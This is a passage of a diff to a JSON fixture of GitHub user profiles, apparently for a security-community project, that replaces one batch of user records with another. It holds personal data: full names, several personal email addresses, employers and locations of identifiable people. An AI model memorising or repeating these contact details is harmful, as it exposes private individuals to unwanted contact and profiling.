"MDQ6VXNlcjI2NDk5NjY1", - "bio": "It’s me :)", + "following_count": 3, + "followers_count": 31, + "public_gists_count": 3, + "public_repositories_count": 124, + "created_at": "2010-06-16T21:28:42Z", + "updated_at": "2024-08-15T14:49:38Z", + "node_id": "MDQ6VXNlcjMwNzE1NA==", + "bio": "", "is_hireable": true, - "twitter_username": "" + "twitter_username": "jiramot" } }, { "model": "github.user", - "pk": 2518, + "pk": 7872, "fields": { - "nest_created_at": "2024-09-12T01:30:23.294Z", - "nest_updated_at": "2024-09-12T01:30:23.294Z", + "nest_created_at": "2024-09-22T09:37:22.231Z", + "nest_updated_at": "2024-09-22T19:36:24.127Z", "name": "", - "login": "vasba", + "login": "WheelsVT", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9578779?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/11450812?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 42, - "created_at": "2014-11-05T21:01:50Z", - "updated_at": "2024-08-07T08:32:41Z", - "node_id": "MDQ6VXNlcjk1Nzg3Nzk=", + "following_count": 0, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 5, + "created_at": "2015-03-13T01:52:24Z", + "updated_at": "2024-08-28T15:53:46Z", + "node_id": "MDQ6VXNlcjExNDUwODEy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423203,49 +682727,49 @@ }, { "model": "github.user", - "pk": 2519, + "pk": 7873, "fields": { - "nest_created_at": "2024-09-12T01:30:28.505Z", - "nest_updated_at": "2024-09-12T01:30:28.506Z", - "name": "Rajat Kumar", - "login": "rajatkumardev", - "email": "rajatsedhras@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/58552459?v=4", - "company": "@CatalystOne @IntegrationOne ", - "location": "", + "nest_created_at": "2024-09-22T09:37:22.558Z", + "nest_updated_at": "2024-09-22T19:36:24.442Z", + "name": "Yù", + "login": "YuToutCourt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/63105226?v=4", + "company": "Thalès", + "location": "France", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 29, + "followers_count": 26, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-12-05T10:20:30Z", - "updated_at": "2024-08-16T06:43:28Z", - "node_id": "MDQ6VXNlcjU4NTUyNDU5", - "bio": "Site Reliability Engineer | DevOps | DevSecOps", - "is_hireable": true, + "public_repositories_count": 25, + "created_at": "2020-04-03T12:21:29Z", + "updated_at": "2024-09-13T17:06:42Z", + "node_id": "MDQ6VXNlcjYzMTA1MjI2", + "bio": "We're all lonely pixels", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2520, + "pk": 7874, "fields": { - "nest_created_at": "2024-09-12T01:30:31.474Z", - "nest_updated_at": "2024-09-12T01:32:17.635Z", - "name": "S Manjunath", - "login": "trigomanju", + "nest_created_at": "2024-09-22T09:37:22.865Z", + "nest_updated_at": "2024-09-22T19:38:23.746Z", + "name": "Bruce Parr", + "login": "bp4151", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/110160563?v=4", - "company": "www.trigogroup.in", - "location": "Bangalore INDIA", + "avatar_url": "https://avatars.githubusercontent.com/u/1420702?v=4", + "company": "Paylocity", + "location": "Pennsylvania", "collaborators_count": 0, - "following_count": 7, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-07-28T08:14:42Z", - "updated_at": "2023-02-23T10:58:03Z", - "node_id": "U_kgDOBpDqsw", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 3, + "public_repositories_count": 20, + "created_at": "2012-02-08T19:27:15Z", + "updated_at": "2024-08-15T01:07:17Z", + "node_id": "MDQ6VXNlcjE0MjA3MDI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423253,174 +682777,174 @@ }, { "model": "github.user", - "pk": 2521, + "pk": 7875, "fields": { - "nest_created_at": "2024-09-12T01:30:35.831Z", - "nest_updated_at": "2024-09-12T01:30:35.831Z", - "name": "Troy Marshall", - "login": "troymarshall", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7916308?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:37:23.192Z", + "nest_updated_at": "2024-09-22T19:36:25.116Z", + "name": "Bastian Hodapp", + "login": "Bassadin", + "email": "bastianhodapp@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1810902?v=4", + "company": "Nesto Software GmbH", + "location": "Karlsruhe, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 2, - "public_repositories_count": 8, - "created_at": "2014-06-17T19:16:44Z", - "updated_at": "2024-05-21T18:09:04Z", - "node_id": "MDQ6VXNlcjc5MTYzMDg=", - "bio": "", - "is_hireable": false, + "following_count": 52, + "followers_count": 22, + "public_gists_count": 0, + "public_repositories_count": 87, + "created_at": "2012-06-02T22:15:55Z", + "updated_at": "2024-09-15T20:49:46Z", + "node_id": "MDQ6VXNlcjE4MTA5MDI=", + "bio": "Profile Image by @Plagiatus", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2522, + "pk": 7876, "fields": { - "nest_created_at": "2024-09-12T01:30:42.719Z", - "nest_updated_at": "2024-09-16T22:28:33.411Z", - "name": "Daniel Mendes", - "login": "webmutation", + "nest_created_at": "2024-09-22T09:37:23.819Z", + "nest_updated_at": "2024-09-22T19:36:25.750Z", + "name": "C0wnuts", + "login": "C0wnuts", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/761367?v=4", - "company": "European Commision", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22750213?v=4", + "company": "", + "location": "Behind your shoulder", "collaborators_count": 0, - "following_count": 16, - "followers_count": 10, - "public_gists_count": 7, - "public_repositories_count": 36, - "created_at": "2011-05-01T01:52:19Z", - "updated_at": "2024-09-12T19:32:23Z", - "node_id": "MDQ6VXNlcjc2MTM2Nw==", + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2016-10-10T15:55:02Z", + "updated_at": "2024-09-21T11:34:49Z", + "node_id": "MDQ6VXNlcjIyNzUwMjEz", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "kevin_racca" } }, { "model": "github.user", - "pk": 2523, + "pk": 7877, "fields": { - "nest_created_at": "2024-09-12T01:30:44.372Z", - "nest_updated_at": "2024-09-12T02:07:41.228Z", - "name": "Florian", - "login": "a5a351e7", + "nest_created_at": "2024-09-22T09:37:24.133Z", + "nest_updated_at": "2024-09-22T19:36:26.064Z", + "name": "Alex of Cyberia", + "login": "cy83r14n", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10687719?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/130239788?v=4", "company": "", - "location": "", + "location": "Tokyo", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2015-01-24T19:03:00Z", - "updated_at": "2024-08-28T06:31:44Z", - "node_id": "MDQ6VXNlcjEwNjg3NzE5", - "bio": "", + "public_repositories_count": 3, + "created_at": "2023-04-08T16:20:33Z", + "updated_at": "2024-08-09T10:08:03Z", + "node_id": "U_kgDOB8NNLA", + "bio": "1337 Security Engineer // DevOps", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2524, + "pk": 7878, "fields": { - "nest_created_at": "2024-09-12T01:30:50.581Z", - "nest_updated_at": "2024-09-12T01:30:50.581Z", - "name": "Niklas Keerl", - "login": "niklaskeerl", + "nest_created_at": "2024-09-22T09:37:24.763Z", + "nest_updated_at": "2024-09-22T19:36:26.693Z", + "name": "Charles Timko", + "login": "sparticvs", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33728607?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/847020?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 13, - "followers_count": 21, - "public_gists_count": 21, - "public_repositories_count": 5, - "created_at": "2017-11-16T16:32:15Z", - "updated_at": "2024-08-23T16:10:07Z", - "node_id": "MDQ6VXNlcjMzNzI4NjA3", - "bio": "", + "following_count": 6, + "followers_count": 14, + "public_gists_count": 2, + "public_repositories_count": 68, + "created_at": "2011-06-13T14:25:54Z", + "updated_at": "2024-09-10T18:33:56Z", + "node_id": "MDQ6VXNlcjg0NzAyMA==", + "bio": "Red Hatter", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2525, + "pk": 7879, "fields": { - "nest_created_at": "2024-09-12T01:30:51.854Z", - "nest_updated_at": "2024-09-12T01:31:32.513Z", - "name": "Arnaud de Bock", - "login": "phoenixadb", - "email": "arnaud.debock@orange.com", - "avatar_url": "https://avatars.githubusercontent.com/u/2065650?v=4", - "company": "Orange Innovation", - "location": "Rennes, France", + "nest_created_at": "2024-09-22T09:37:25.078Z", + "nest_updated_at": "2024-09-22T19:36:27.015Z", + "name": "Damián Pardiñas", + "login": "damianpr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/52545405?v=4", + "company": "", + "location": "A Coruña, Galiza.", "collaborators_count": 0, - "following_count": 4, - "followers_count": 6, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2012-07-30T14:55:29Z", - "updated_at": "2024-06-27T14:26:27Z", - "node_id": "MDQ6VXNlcjIwNjU2NTA=", - "bio": "Architect @Orange #Web #Mobile #Telco #Security", + "public_repositories_count": 1, + "created_at": "2019-07-04T18:02:42Z", + "updated_at": "2024-08-22T18:30:41Z", + "node_id": "MDQ6VXNlcjUyNTQ1NDA1", + "bio": "IT Engineer.\r\n\r\nCybersecurity student", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2526, + "pk": 7880, "fields": { - "nest_created_at": "2024-09-12T01:30:53.916Z", - "nest_updated_at": "2024-09-12T02:07:35.712Z", - "name": "May B.", - "login": "ShuP1", - "email": "shu@wadza.fr", - "avatar_url": "https://avatars.githubusercontent.com/u/16181031?v=4", - "company": "Orange", - "location": "France", + "nest_created_at": "2024-09-22T09:37:25.388Z", + "nest_updated_at": "2024-09-22T19:36:27.325Z", + "name": "Daniel", + "login": "DaniJG", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3903889?v=4", + "company": "", + "location": "Dublin", "collaborators_count": 0, - "following_count": 5, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 45, - "created_at": "2015-12-06T22:09:31Z", - "updated_at": "2024-08-27T07:07:52Z", - "node_id": "MDQ6VXNlcjE2MTgxMDMx", - "bio": "Humanoid code generator — sh -u π", + "following_count": 1, + "followers_count": 75, + "public_gists_count": 6, + "public_repositories_count": 37, + "created_at": "2013-03-18T22:41:23Z", + "updated_at": "2024-08-29T10:14:24Z", + "node_id": "MDQ6VXNlcjM5MDM4ODk=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2527, + "pk": 7881, "fields": { - "nest_created_at": "2024-09-12T01:30:57.364Z", - "nest_updated_at": "2024-09-12T01:31:20.127Z", - "name": "M van Eck", - "login": "mveck", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/35631189?v=4", + "nest_created_at": "2024-09-22T09:37:25.696Z", + "nest_updated_at": "2024-09-22T19:36:27.634Z", + "name": "Daniel Hokka Zakrisson", + "login": "dhozac", + "email": "daniel@hozac.com", + "avatar_url": "https://avatars.githubusercontent.com/u/705161?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-01-20T14:26:11Z", - "updated_at": "2024-07-18T11:17:31Z", - "node_id": "MDQ6VXNlcjM1NjMxMTg5", + "followers_count": 18, + "public_gists_count": 3, + "public_repositories_count": 19, + "created_at": "2011-04-02T08:46:56Z", + "updated_at": "2024-09-03T11:58:17Z", + "node_id": "MDQ6VXNlcjcwNTE2MQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423428,14 +682952,14 @@ }, { "model": "github.user", - "pk": 2528, + "pk": 7882, "fields": { - "nest_created_at": "2024-09-12T01:31:00.383Z", - "nest_updated_at": "2024-09-16T22:28:35.516Z", - "name": "", - "login": "Mvld3r", + "nest_created_at": "2024-09-22T09:37:26.016Z", + "nest_updated_at": "2024-09-22T19:36:27.955Z", + "name": "Dennis Salzmann", + "login": "nnamzlas", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26394852?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/63775165?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -423443,9 +682967,9 @@ "followers_count": 1, "public_gists_count": 0, "public_repositories_count": 3, - "created_at": "2017-03-13T23:40:41Z", - "updated_at": "2023-01-04T16:55:05Z", - "node_id": "MDQ6VXNlcjI2Mzk0ODUy", + "created_at": "2020-04-16T07:08:36Z", + "updated_at": "2024-09-18T16:01:22Z", + "node_id": "MDQ6VXNlcjYzNzc1MTY1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423453,49 +682977,24 @@ }, { "model": "github.user", - "pk": 2529, + "pk": 7883, "fields": { - "nest_created_at": "2024-09-12T01:31:04.612Z", - "nest_updated_at": "2024-09-12T01:31:04.612Z", - "name": "roadSurfer", - "login": "roadSurfer", + "nest_created_at": "2024-09-22T09:37:26.350Z", + "nest_updated_at": "2024-09-22T19:36:28.284Z", + "name": "DevSecOps", + "login": "DevSecOps-Isotrol", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38717523?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/144797150?v=4", "company": "", - "location": "Here", + "location": "", "collaborators_count": 0, - "following_count": 2, + "following_count": 0, "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 12, - "created_at": "2018-04-25T07:49:02Z", - "updated_at": "2024-08-10T20:10:44Z", - "node_id": "MDQ6VXNlcjM4NzE3NTIz", - "bio": "I do stuff with things", - "is_hireable": false, - "twitter_username": "" - } -}, -{ - "model": "github.user", - "pk": 2530, - "fields": { - "nest_created_at": "2024-09-12T01:31:05.878Z", - "nest_updated_at": "2024-09-18T00:18:12.831Z", - "name": "Mikael Carneholm", - "login": "carniz", - "email": "mikael.carneholm@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1648530?v=4", - "company": "Compio IT AB", - "location": "Trieste (Italy)", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2012-04-16T15:03:46Z", - "updated_at": "2024-09-13T16:23:42Z", - "node_id": "MDQ6VXNlcjE2NDg1MzA=", + "public_repositories_count": 1, + "created_at": "2023-09-12T11:05:16Z", + "updated_at": "2024-08-12T06:04:46Z", + "node_id": "U_kgDOCKFt3g", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423503,14 +683002,14 @@ }, { "model": "github.user", - "pk": 2531, + "pk": 7884, "fields": { - "nest_created_at": "2024-09-12T01:31:09.571Z", - "nest_updated_at": "2024-09-12T01:31:09.571Z", - "name": "", - "login": "stefanCCS", + "nest_created_at": "2024-09-22T09:37:26.659Z", + "nest_updated_at": "2024-09-22T19:36:28.611Z", + "name": "Dmitry", + "login": "Sh1nZ0u", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/61045115?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/130338838?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -423518,9 +683017,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 1, - "created_at": "2020-02-14T08:48:08Z", - "updated_at": "2024-08-30T08:04:20Z", - "node_id": "MDQ6VXNlcjYxMDQ1MTE1", + "created_at": "2023-04-10T05:28:27Z", + "updated_at": "2023-04-10T05:30:36Z", + "node_id": "U_kgDOB8TQFg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423528,24 +683027,24 @@ }, { "model": "github.user", - "pk": 2532, + "pk": 7885, "fields": { - "nest_created_at": "2024-09-12T01:31:13.856Z", - "nest_updated_at": "2024-09-12T01:31:13.856Z", - "name": "Jonathan Share", - "login": "sharebear", + "nest_created_at": "2024-09-22T09:37:26.979Z", + "nest_updated_at": "2024-09-22T19:36:28.922Z", + "name": "", + "login": "Dylan-OB", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/161351?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/134280393?v=4", "company": "", - "location": "Oslo, Norway", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 11, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 25, - "created_at": "2009-12-03T11:59:36Z", - "updated_at": "2024-08-15T11:58:26Z", - "node_id": "MDQ6VXNlcjE2MTM1MQ==", + "public_repositories_count": 0, + "created_at": "2023-05-22T10:27:04Z", + "updated_at": "2024-09-20T10:09:02Z", + "node_id": "U_kgDOCAD0yQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423553,49 +683052,49 @@ }, { "model": "github.user", - "pk": 2533, + "pk": 7886, "fields": { - "nest_created_at": "2024-09-12T01:31:16.787Z", - "nest_updated_at": "2024-09-12T01:31:16.787Z", - "name": "Security Mantra", - "login": "SecMantra", + "nest_created_at": "2024-09-22T09:37:27.293Z", + "nest_updated_at": "2024-09-22T19:36:29.233Z", + "name": "ECOMMPAY", + "login": "ECOMMPAY", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/57031553?v=4", - "company": "Security Mantra", - "location": "India", + "avatar_url": "https://avatars.githubusercontent.com/u/32565446?v=4", + "company": "@ITECOMMPAY ", + "location": "London, UK", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2019-10-26T08:15:08Z", - "updated_at": "2024-04-12T08:33:09Z", - "node_id": "MDQ6VXNlcjU3MDMxNTUz", - "bio": "Making the Cyber space more and more stronger.", + "public_repositories_count": 3, + "created_at": "2017-10-06T08:11:34Z", + "updated_at": "2024-09-11T09:44:35Z", + "node_id": "MDQ6VXNlcjMyNTY1NDQ2", + "bio": "ECOMMPAY is an international payment service provider and direct card acquirer. Holding Visa / Mastercard Principal Member status.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "ECOMMPAYglobal" } }, { "model": "github.user", - "pk": 2534, + "pk": 7887, "fields": { - "nest_created_at": "2024-09-12T01:31:21.598Z", - "nest_updated_at": "2024-09-12T01:31:21.598Z", - "name": "Tc", - "login": "LIFEcmd", + "nest_created_at": "2024-09-22T09:37:27.661Z", + "nest_updated_at": "2024-09-22T19:36:29.541Z", + "name": "Emre Saglam", + "login": "emresaglam-dremio", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/66239815?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/39532372?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-06-01T06:17:27Z", - "updated_at": "2023-04-23T15:24:19Z", - "node_id": "MDQ6VXNlcjY2MjM5ODE1", + "public_repositories_count": 3, + "created_at": "2018-05-22T17:47:53Z", + "updated_at": "2024-07-16T17:19:50Z", + "node_id": "MDQ6VXNlcjM5NTMyMzcy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423603,24 +683102,24 @@ }, { "model": "github.user", - "pk": 2535, + "pk": 7888, "fields": { - "nest_created_at": "2024-09-12T01:31:25.762Z", - "nest_updated_at": "2024-09-12T01:33:54.284Z", - "name": "", - "login": "eL-Prova", + "nest_created_at": "2024-09-22T09:37:28.281Z", + "nest_updated_at": "2024-09-22T19:36:30.165Z", + "name": "Eric G", + "login": "celonis-eg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2064632?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/107431356?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 6, + "following_count": 2, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 27, - "created_at": "2012-07-30T11:30:04Z", - "updated_at": "2024-07-10T09:18:21Z", - "node_id": "MDQ6VXNlcjIwNjQ2MzI=", + "public_repositories_count": 0, + "created_at": "2022-06-13T18:17:15Z", + "updated_at": "2024-03-11T13:13:27Z", + "node_id": "U_kgDOBmdFvA", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423628,74 +683127,74 @@ }, { "model": "github.user", - "pk": 2536, + "pk": 7889, "fields": { - "nest_created_at": "2024-09-12T01:31:28.306Z", - "nest_updated_at": "2024-09-16T22:28:40.235Z", - "name": "Olaf van Zandwijk", - "login": "olafz", + "nest_created_at": "2024-09-22T09:37:28.632Z", + "nest_updated_at": "2024-09-22T19:36:30.481Z", + "name": "F. Markus", + "login": "flmarkus", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/80709?v=4", - "company": "Nedap N.V.", - "location": "Enschede, The Netherlands", + "avatar_url": "https://avatars.githubusercontent.com/u/82434148?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 15, - "followers_count": 31, - "public_gists_count": 3, - "public_repositories_count": 26, - "created_at": "2009-05-04T09:56:08Z", - "updated_at": "2024-05-25T16:34:36Z", - "node_id": "MDQ6VXNlcjgwNzA5", - "bio": "CISSP | Security, Infrastructure & Technology @ Nedap | AS213050", + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-04-13T06:02:09Z", + "updated_at": "2024-03-23T15:09:53Z", + "node_id": "MDQ6VXNlcjgyNDM0MTQ4", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2537, + "pk": 7890, "fields": { - "nest_created_at": "2024-09-12T01:31:30.001Z", - "nest_updated_at": "2024-09-12T01:33:55.622Z", - "name": "Robert Sirre", - "login": "Atrejoe", + "nest_created_at": "2024-09-22T09:37:29.571Z", + "nest_updated_at": "2024-09-22T19:36:31.471Z", + "name": "A C", + "login": "a1ec", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/585091?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/17076802?v=4", "company": "", - "location": "Rotterdam, The Netherlands", + "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 14, - "public_gists_count": 1, - "public_repositories_count": 38, - "created_at": "2011-01-26T18:36:14Z", - "updated_at": "2024-07-08T18:54:04Z", - "node_id": "MDQ6VXNlcjU4NTA5MQ==", + "following_count": 1, + "followers_count": 2, + "public_gists_count": 2, + "public_repositories_count": 13, + "created_at": "2016-02-05T03:01:53Z", + "updated_at": "2024-08-26T19:40:14Z", + "node_id": "MDQ6VXNlcjE3MDc2ODAy", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2538, + "pk": 7891, "fields": { - "nest_created_at": "2024-09-12T01:31:34.656Z", - "nest_updated_at": "2024-09-12T02:07:50.908Z", - "name": "", - "login": "Gator8", - "email": "kevin@kjquinn.ca", - "avatar_url": "https://avatars.githubusercontent.com/u/7840300?v=4", + "nest_created_at": "2024-09-22T09:37:29.887Z", + "nest_updated_at": "2024-09-22T19:36:31.790Z", + "name": "Aaron Miles", + "login": "aaronm-sysdig", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/132866139?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2014-06-09T16:30:51Z", - "updated_at": "2024-05-19T19:26:43Z", - "node_id": "MDQ6VXNlcjc4NDAzMDA=", + "public_repositories_count": 23, + "created_at": "2023-05-08T03:03:27Z", + "updated_at": "2024-09-17T02:55:57Z", + "node_id": "U_kgDOB-tgWw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423703,24 +683202,24 @@ }, { "model": "github.user", - "pk": 2539, + "pk": 7892, "fields": { - "nest_created_at": "2024-09-12T01:31:40.115Z", - "nest_updated_at": "2024-09-12T02:07:43.850Z", - "name": "", - "login": "clin4", + "nest_created_at": "2024-09-22T09:37:30.198Z", + "nest_updated_at": "2024-09-22T19:36:32.105Z", + "name": "Ahmad Khan", + "login": "ahmsec", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26919744?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1098754?v=4", "company": "", - "location": "", + "location": "United States", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, + "following_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-04-05T07:27:33Z", - "updated_at": "2023-12-12T19:19:40Z", - "node_id": "MDQ6VXNlcjI2OTE5NzQ0", + "public_repositories_count": 4, + "created_at": "2011-10-03T12:56:48Z", + "updated_at": "2024-08-28T18:45:44Z", + "node_id": "MDQ6VXNlcjEwOTg3NTQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423728,74 +683227,74 @@ }, { "model": "github.user", - "pk": 2540, + "pk": 7893, "fields": { - "nest_created_at": "2024-09-12T01:31:41.861Z", - "nest_updated_at": "2024-09-12T01:31:41.861Z", - "name": "Kirill Bobrov", - "login": "KirillBobrov06", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/41997200?v=4", + "nest_created_at": "2024-09-22T09:37:30.519Z", + "nest_updated_at": "2024-09-22T20:30:37.157Z", + "name": "Al", + "login": "xee5ch", + "email": "xee5ch@member.fsf.org", + "avatar_url": "https://avatars.githubusercontent.com/u/170308?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-08-01T11:58:34Z", - "updated_at": "2023-12-01T15:33:38Z", - "node_id": "MDQ6VXNlcjQxOTk3MjAw", - "bio": "", + "following_count": 22, + "followers_count": 41, + "public_gists_count": 34, + "public_repositories_count": 362, + "created_at": "2009-12-21T01:34:33Z", + "updated_at": "2024-09-20T11:23:02Z", + "node_id": "MDQ6VXNlcjE3MDMwOA==", + "bio": "Security engineer or developer or DevSecOps person or whatever. I love OSCAL, I run oscal.club.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2541, + "pk": 7894, "fields": { - "nest_created_at": "2024-09-12T01:31:48.589Z", - "nest_updated_at": "2024-09-16T22:28:41.272Z", - "name": "AnilFe", - "login": "anilfe", + "nest_created_at": "2024-09-22T09:37:30.868Z", + "nest_updated_at": "2024-09-22T19:36:32.741Z", + "name": "Alejandro", + "login": "bugavant", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/34770392?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/34648262?v=4", "company": "", - "location": "Berlin", + "location": "Ireland", "collaborators_count": 0, - "following_count": 5, - "followers_count": 2, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-12-22T12:02:53Z", - "updated_at": "2023-12-12T12:06:17Z", - "node_id": "MDQ6VXNlcjM0NzcwMzky", - "bio": "Ars longa vita brevis", + "public_repositories_count": 1, + "created_at": "2017-12-18T10:58:07Z", + "updated_at": "2020-11-16T12:11:11Z", + "node_id": "MDQ6VXNlcjM0NjQ4MjYy", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2542, + "pk": 7895, "fields": { - "nest_created_at": "2024-09-12T01:31:52.336Z", - "nest_updated_at": "2024-09-16T22:28:42.261Z", - "name": "shuaihu", - "login": "sxgnhs", + "nest_created_at": "2024-09-22T09:37:31.668Z", + "nest_updated_at": "2024-09-22T19:36:33.489Z", + "name": "Alperen", + "login": "AlperenY-cs", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/35444755?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/45148606?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 16, + "followers_count": 14, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-01-15T06:20:23Z", - "updated_at": "2024-01-03T02:19:29Z", - "node_id": "MDQ6VXNlcjM1NDQ0NzU1", + "public_repositories_count": 14, + "created_at": "2018-11-18T17:12:15Z", + "updated_at": "2024-09-16T14:43:16Z", + "node_id": "MDQ6VXNlcjQ1MTQ4NjA2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423803,24 +683302,24 @@ }, { "model": "github.user", - "pk": 2543, + "pk": 7896, "fields": { - "nest_created_at": "2024-09-12T01:31:54.002Z", - "nest_updated_at": "2024-09-12T01:31:54.002Z", - "name": "", - "login": "Azulath", - "email": "alexander.zrinyi@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/5717474?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:37:31.991Z", + "nest_updated_at": "2024-09-22T19:36:33.814Z", + "name": "Anderson dos Anjos Slompo", + "login": "anderson-slompo", + "email": "anderson.anjos.slompo@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/11077354?v=4", + "company": "@tecban", + "location": "Ponta Grossa - BR", "collaborators_count": 0, - "following_count": 2, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2013-10-18T10:39:26Z", - "updated_at": "2024-08-26T21:19:38Z", - "node_id": "MDQ6VXNlcjU3MTc0NzQ=", + "following_count": 13, + "followers_count": 16, + "public_gists_count": 2, + "public_repositories_count": 2, + "created_at": "2015-02-19T16:23:31Z", + "updated_at": "2024-09-20T17:28:58Z", + "node_id": "MDQ6VXNlcjExMDc3MzU0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423828,24 +683327,24 @@ }, { "model": "github.user", - "pk": 2544, + "pk": 7897, "fields": { - 